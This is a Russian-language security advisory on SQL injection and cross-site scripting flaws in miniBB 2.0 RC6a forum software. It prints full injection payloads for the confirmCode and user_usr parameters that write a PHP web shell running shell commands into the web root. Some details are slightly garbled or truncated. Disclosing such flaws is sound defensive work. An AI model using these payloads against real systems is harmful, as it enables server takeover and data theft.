Дата публикации: | 02.05.2006 |
Дата изменения: | 06.04.2009 |
Всего просмотров: | 3635 |
Опасность: | Средняя |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Межсайтовый скриптинг |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | miniBB 2.x |
Уязвимые версии: miniBB 2.0 RC6a, возможно более ранние версии.
Описание: 1. Уязвимость существует из-за недостаточной обработки входных данных в параметрах confirmCode и post в сценарии index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Примеры:
/index.php?action=confirmpasswd&confirmCode=f' union select ' passthru($_GET[cmd])
?>' from mysql.user INTO OUTFILE '/var/www/html/shell.php'/* 2. Уязвимость существует из-за недостаточной обработки входных данных в параметрах “user_usr”, “email” и “login”. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольные SQL команды в базе данных приложения. Пример:
user_usr=f' union select ' passthru($_GET[cmd]) ?>','123' from mysql.user
INTO OUTFILE '/var/www/html/shell.php'/* 3.Уязвимость существует из-за недостаточной обработки входных данных в параметре “queryStr”. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:
POST /index.php?sortBy=1 HTTP/1.0 Уязвимости #1 и #2 обнаружил KeVRter (KeVRter@netw.ru) URL производителя: www.minibb.net Решение: Способов устранения уязвимости не существует в настоящее время. |